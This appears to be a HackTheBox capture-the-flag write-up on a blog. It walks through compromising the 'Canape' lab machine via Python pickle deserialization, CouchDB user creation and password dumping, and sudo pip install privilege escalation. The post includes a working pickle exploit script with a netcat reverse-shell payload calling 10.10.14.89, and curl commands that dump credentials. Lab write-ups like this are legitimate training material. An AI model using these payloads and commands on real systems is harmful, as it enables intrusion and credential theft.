HackTheBox Writeup — Canape

Hello Guys , I am Faisal Husaini and this is my first writeup on Medium and also the first writeup in any platform on the web. My username on HTB is “faisalelino” .

This writeup is on Canape box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.

The IP for this machine is 10.10.10.70 , so let’s get started

We see that port 80 is open running Apache httpd 2.4.18 .Also if you notice in the results , we can see that there is a /git directory in the web server , lets see what does it contain

So we access 10.10.10.70/.git in the browser , we get

http://10.10.10.70/.git

There is a directory listing and also a “config” file in it , lets see what does it contain

http://10.10.10.70/.git/config

We see it has a “url=http://git.canape.htb/simpsons.git” , so let’s clone the file , but before that , we have to add “canape.htb” and “git.canape.htb” to our host file like this

Editing /etc/hosts

Now lets clone the file from the url we got..

git clone (simpsons.git)

We got the simpsons folder containing some files , lets see the files in it

cat __init__.py

We see it has a __init__.py file containing some code , but the main thing to point out is the cPickle module imported , which means that there might be a Pickle Injection Vulnerability , lets dig further more

As we came to know that it might have a pickle injection vulnerability , so I referred to a blog to learn more about it as I was not much aware of this vulnerability

We need to create a python script exploit to trigger the vulnerability

import os
import cPickle
from hashlib import md5
import requests

# Exploit that we want the target to unpickle

class Exploit(object):
def __reduce__(self):
return (os.system, (‘homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f’,))

shellcode = cPickle.dumps(Exploit())
print shellcode + “\n”
print md5(shellcode).hexdigest()

part1 = str(shellcode.split(“;”)[0])
part2 = str(“;”+shellcode.split(“;”)[1])
part3 = str(“;”+shellcode.split(“;”)[2])
part4 = str(“;”+shellcode.split(“;”)[3])

r = requests.post(“http://10.10.10.70/submit", data={‘character’: str(part1), ‘quote’:str(part2 + part3 + part4)})

print(r.status_code, r.reason, r.text)

r2 = requests.post(“http://10.10.10.70/check", data={‘id’: md5(shellcode).hexdigest()})

print(r2.status_code, r2.reason, r2.text)

Please do the give the gaps after the class and functions as medium isn’t supporting tabs

So after getting everything ready , we set up a netcat listener on port 1234 as I gave that port to get the reverse connection on the python-exploit.py script , so now lets the exploit

Reverse Connection Through Python Pickle Injection

Cool! We got a reverse connection , now lets further dig it up

As we got the shell , lets get a tty using python

Getting tty

As we are www-data , so we cant get access to the user “Homer” on this box.

Let’s run “ps aux | grep homer” , and see what processes are running from the Homer user

ps aux | grep homer

We can see that it is running couchdb , so lets search for Couchdb exploit or privilege escalation methods

Here we use curl commands to create a admin user in the couchdb database and also get the complete user and password from it

curl -X PUT ‘http://127.0.0.1:5984/_users/org.couchdb.user:faisal' — data-binary ‘{“type”:”user”,”name”:”faisal”,”roles”:[“_admin”],”roles”:[],”password”:”toor”}’

Creating our own user on the database

We have successfully created a user in the db , to confirm we use the below command

curl -X GET ‘http://faisal:toor@127.0.0.1:5984/_users/_all_docs'

Confirming the user created

Here we confirm that the user we created for the db has successfully being created

Now we dump the username and password from the db using the below command:

curl -X GET ‘http://faisal:toor@127.0.0.1:5984/passwords/_all_docs?include_docs=true'

Dumping the usernames and passwords

From the dumped data , we can see that there is password for the user “homer” which is “h02ddjdj2k2k2”

Let’s try to connect to the user using “su homer” and then providing the password

su homer

It fails , hmmm , also we see that there was only port 80 open from the nmap scan we did … but the dump also has a password for ssh, i.e , “0B4jyA0xtytZi7esBNGp”, with no user given.

Maybe it is the ssh password for the user “homer”, but we see no SSH Port open from the normal nmap scan we did before , so lets try the full nmap scan using the command below:

nmap -sV -sC 10.10.10.70 -p- — min-rate 1000

NMAP Full Port Scan

We see that there one more port open , i.e , 65535 , which for me was a complete troll to me :P as I was hitting my head so get connected to “homer” user

Lets try connecting to the user “homer” through ssh

We try to connect to ssh using the command below:

ssh homer@10.10.10.70 -p 65535

Password: 0B4jyA0xtytZi7esBNGp

SSH Connection Successful

Bingo! We got in , lets now dig into it and get the user flag and root flag (which still requires a full privilege escalation for root flag)

sudo -l

When we type the “sudo -l” command , we get that we can use sudo with /usr/bin/pip install *

So lets exploit it using that , but first we create a python script so that we can get a reverse shell back to us when we pip install , after we set up a netcat listener to get the reverse shell back

Python Script To Exploit /usr/bin/pip install * as sudo

Here is our code ready and now lets do the exploitation part

We use the following command:

sudo /usr/bin/pip install . — upgrade — force-reinstall

Also set up a nc listener on our host machine

Command + Listener

All set , now time to exploit

Exploit Successful

Voila!! We got root , now time to get both of the flags…!

The user flag is in the home directory of user “homer”

user.txt

We got the user flag

The root flag is under the /root directory

root.txt

We got the root.flag as well

Vulnerabilities in the box as follows :-

1) Python Pickle Injection → To get RCE and get a low privilege shell
2) CouchDB →To get user privileges from www-data
3) Running sudo as /usr/bin/pip install * → To get root access

References

Below are the links which helped me solving the box:-

https://blog.nelhage.com/2011/03/exploiting-pickle/

https://lincolnloop.com/blog/playing-pickle-security/

https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/

https://wiki.apache.org/couchdb/How_to_create_users_via_script

https://github.com/0x00-0x00/FakePip

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store